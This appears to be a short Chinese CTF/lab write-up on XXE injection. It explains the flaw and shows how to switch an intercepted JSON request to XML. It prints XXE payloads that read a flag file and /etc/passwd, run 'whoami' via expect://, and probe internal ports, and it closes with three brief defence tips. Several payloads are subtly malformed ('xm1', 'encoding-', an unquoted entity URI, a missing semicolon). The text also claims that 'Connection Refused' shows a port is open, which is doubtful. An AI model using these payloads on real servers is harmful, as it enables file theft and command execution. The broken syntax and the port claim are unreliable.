xxe漏洞原理
- Web应用的脚本代码没有限制XML引入外部实体,从而导致测试者可以创建一个包含外部实体的XML,使得其中的内容会被服务器端执行
- 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害
xxe联系靶场
复现步骤
打开代理进行抓包操作
明显看到使用的是json读取
我们将包放进重发模块修改成xml读取方式
读取flag包
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///home/ctf/flag.txt"> ]> <x>&f;</x>
其他的执行未截图,感兴趣的可以试一试
执行系统命令
如果服务器环境中安装了某些特定的扩展,即可利用其造成任意命令执行,如攻击者构造如下的XML文档:
<?xml version="1.0" encoding-"utf-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "expect://whoami">]><x>&xxe;</x>
读取任意文件命令
如果攻击者可以控制服务器解析的XML文档的内容,引入攻击者想要读取的文件内容作为外部实体,即可尝试读取任意的文件内容。如攻击者构造如下的XML文档就会将/etc/passwd文件的内容引入进来并回显在页面中,造成敏感文件内容泄露。
<?xm1 version="1.0" encoding-"utf-8"?><!DOCTYPE ANY[<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>
探测内网接口
如果Web服务器的的执行环境在内网,则可以通过请求内网IP的某个端口来判断该IP 的相应端口是否开放,这可以通过直接引用外部实体的方式引入要访问该端口的链接即可实现:
<?xm1 version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM http://ip:80/mark
]>
<x>&xxe</x>
如果回显结果为“Connection Refused”,即可以判断该IP的80端口是开放的。
如何防御xxe漏洞
1.使用开发语言提供的禁用外部实体的方法
2.过滤用户提交的XML数据,过滤关键词
3.使用第三方应用代码及时升级补丁